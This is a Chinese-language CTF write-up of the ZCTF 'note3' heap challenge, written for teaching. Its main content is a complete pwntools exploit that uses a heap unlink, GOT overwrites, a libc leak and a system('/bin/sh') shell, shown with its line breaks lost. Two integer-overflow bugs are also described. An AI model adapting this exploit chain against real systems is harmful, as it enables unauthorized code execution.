ZCTF note3：一种新解法( 二 ) _生活百科

3.getshell
最后将atoi@got值改为system地址，然后在选择功能时输入/bin/sh即可得到shell 。
Expolit漏洞利用代码如下：
from pwn import *p = process('./note3')#context.log_level = 'debug'def new(size,content): p.sendlineafter('option--->>','1') p.sendlineafter('1024)',str(size)) p.sendlineafter('content:', content) p.recvuntil('\n')def edit(idx, content): p.sendlineafter('option--->>','3') p.sendlineafter('note:', str(idx)) p.sendlineafter('content:', content) p.recvuntil('success')def delete(idx): p.sendlineafter('option--->>', '4') p.sendlineafter('note:', str(idx))#gdb.attach(p)# 分配7+1个块new(0x40, 'b'*32)new(0x80, 'b'*32) #为进行unlink，块要大于fastbinnew(0x80, 'b'*32)new(0x80, 'b'*32)new(0x80, 'b'*32)new(0x80, 'b'*32)new(0x80, 'b'*32)new(0x80, 'b'*32) #第0块的size变量值会被该块的地址覆盖，进而第0块可以写入足够多的数据target = 0x6020C8 #指向ptrfd = target - 0x18bk = target - 0x10# 构造fake_chunkpayload = p64(0) + p64(0x31) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + b'b'*0x8# 溢出到下一个块，覆盖chunk headerpayload += p64(0x40) + p64(0x90)edit(0,payload)# 向块0写入数据溢出delete(1)# 触发unlink=>ptr[0]=&ptr-0x18elf = ELF('./note3')# 从&ptr-0x18开始写入数据 =># 0x6020C8(ptr+0x00): elf.got['free']chunk0_ptr# 0x6020D0(ptr+0x08): elf.got['puts']chunk1_ptr# 0x6020D8(ptr+0x10): 0x6020C8chunk2_ptrpayload = p64(0)*3 + p64(elf.got['free']) + p64(elf.got['puts']) + p64(0x6020c8)edit(0,payload)# 将free@got改为puts@plt:# 向chunk0_ptr(free@got)写入puts@plt# 注意这里发送的地址是7位，因为程序会在用户输入后面加上\x00，若发送8位会将下一个got地址低字节变为0 。这里puts@plt高字节也为\x00，所以发送7位无影响。edit(0, p64(elf.plt['puts'])[:-1])# 原会调用free(chunk1_put)，实际调用puts(puts@got)泄露地址delete(1)p.recvuntil('\n')# 读取泄露的地址值puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,b'\x00'))print(hex(puts_addr))# 任意地址写，通过edit chunk2_ptr来修改chunk0_ptr的指向，再通过edit chunk0_ptr修改chunk0_ptr指向的值。def write(where,what): edit(2, p64(where)) edit(0, p64(what))# 获取libc基址libc = ELF('./libc-2.23.so')libc_base = puts_addr - libc.symbols['puts']log.success('libc base: ' + hex(libc_base))# 获取system函数地址sys_addr = libc_base + libc.symbols['system']log.success('sys_addr: ' + hex(sys_addr))# 将atio@got值改为system函数地址write(elf.got['atoi'], sys_addr)# 因为atoi改为了system,输入选项时输入"/bin/sh",会执行system("/bin/sh")p.sendlineafter('option--->>','/bin/sh\x00')p.interactive()执行结果如图所示

文章插图
方法2：编辑时整数溢出下图为向块写入时的功能函数，这里变量i定义为unsigned __int64类型，在第7行，当a2为0时，a2-1就会变得"无限大"，从而可以无限制写入数据，溢出到下一个块，利用unlink漏洞实现任意地址写，进而拿到系统shell 。

文章插图
方法3：输入索引整数溢出在edit功能内，调用read_num_4009B9()让用户输入索引，利用求余使索引小于7 。

文章插图
进入read_num_4009B9()函数内，可以看到程序对用户输入进行了判断，若小于0则取相反数。

文章插图
漏洞就出现在，当用户输入的为最大负整数(即-9223372036854775808)，内存中十六进制表示为0x8000000000000000，取相反数过程为-x=~x+1，即0x7fffffffffffffff+1=0x8000000000000000 ，在计算机表示中最大负整数的相反数还是最大负整数！